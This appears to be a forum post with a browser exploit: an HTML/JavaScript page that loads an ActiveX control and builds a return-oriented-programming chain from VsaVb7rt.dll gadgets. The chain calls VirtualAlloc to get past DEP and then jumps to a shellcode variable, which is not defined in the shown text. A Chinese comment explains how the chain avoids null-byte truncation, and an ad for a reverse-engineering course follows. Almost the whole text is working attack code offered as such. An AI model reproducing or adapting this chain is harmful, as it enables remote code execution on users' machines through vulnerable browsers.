<object classid='clsid:A138CF39-2CAE-42c2-ADB3-022658D79F2F'> </object>
<script>
function l32(base,offset){var address=base+offset;s=address.toString(16);while(s.length<8)s="0"+s;s1=s.substring(0,4);s2=s.substring(4,8);return '%u'+s2+'%u'+s1 }
function f()
{
//http://ropshell.com/ropsearch?h=e46d48a7fe961401f1cbf85531cdf05d&p=neg+e%24x
return unescape("%u3270%u5e28"+ // pop ebx/ret
"%u19b1%u5e26"+ //first call xchg eax,esp/ret
"%uf933%u5e34"+ //start to do somethin pop ecx/ret
"%uFFFF%uFFFF"+ //ecx==FFFFFFFF
"%ub44b%u5e2c"+ // ecx=0 inc ecx/ret
"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+
"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+
"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+
"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+"%ub44b%u5e2c"+ //ecx=0x40
"%u3a79%u5e28"+ // POP EAX // RETN [VsaVb7rt.dll]
l32(0,0xfffff000-1)+
"%ub498%u5e34"+ //neg eax/sbb edx,0/ pop edi/pop ebx/ret 10h
"%u4141%u4141"+ //pop edi no use
"%u4241%u4141"+ //pop ebx no use
"%u6ae8%u5e30"+ //push eax/ pop ebx /pop ebp/ret 4
"%u4141%u4141"+
"%u4141%u4141"+
"%u4141%u4141"+
"%u4141%u4141"+
"%u4141%u4141"+
"%ub7cc%u5e34"+ // XOR EDX,EDX // RETN [VsaVb7rt.dll]
"%u4141%u4141"+
"%ub5ee%u5e34"+ // ADD EDX,EBX // POP EBX // RETN 0x10[VsaVb7rt.dll]
"%u4141%u4141"+
"%u3a79%u5e28"+ // POP EAX // RETN [VsaVb7rt.dll]
"%u4141%u4141"+
"%u4141%u4141"+
"%u4141%u4141"+
"%u4141%u4141"+
l32(0,0xfffff000-1)+
"%ub498%u5e34"+ //neg eax/sbb edx,0/ pop edi/pop ebx/ret 10h
"%u4141%u4141"+ //pop edi no use
"%u4141%u4141"+ //pop ebx no use
"%u6ae8%u5e30"+ //push eax/ pop ebx /pop ebp/ret 4
"%u4241%u4141"+
"%u4242%u4141"+
"%u4243%u4141"+
"%u4244%u4141"+
"%u4245%u4141"+
"%u3a79%u5e28"+ // POP EAX // RETN [VsaVb7rt.dll]
"%u4245%u4141"+
"%u113c%u5e23"+ // ptr to &VirtualAlloc() [IAT VsaVb7rt.dll]
"%u2a5f%u5e2a"+ // MOV EAX,DWORD PTR DS:[EAX] // RETN [VsaVb7rt.dll]
"%u4536%u5e30"+ // XCHG EAX,ESI // RETN [VsaVb7rt.dll]
"%ubd6f%u5e28"+ // POP EBP // RETN [VsaVb7rt.dll]
"%u7050%u5e28"+ // & jmp esp [VsaVb7rt.dll]
"%uff8d%u5e24"+ // POP EDI // RETN [VsaVb7rt.dll]
"%u315c%u5e28"+ // RETN (ROP NOP) [VsaVb7rt.dll]
"%u3a79%u5e28"+ // POP EAX // RETN [VsaVb7rt.dll]
"%u9090%u9090"+ // nop
"%u22cc%u5e2f"+ // PUSHAD // RETN [VsaVb7rt.dll]
shellcode);
}
做这么复杂主要是因为0x0000的截断问题,所以这里避免在链中出现%u0000
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
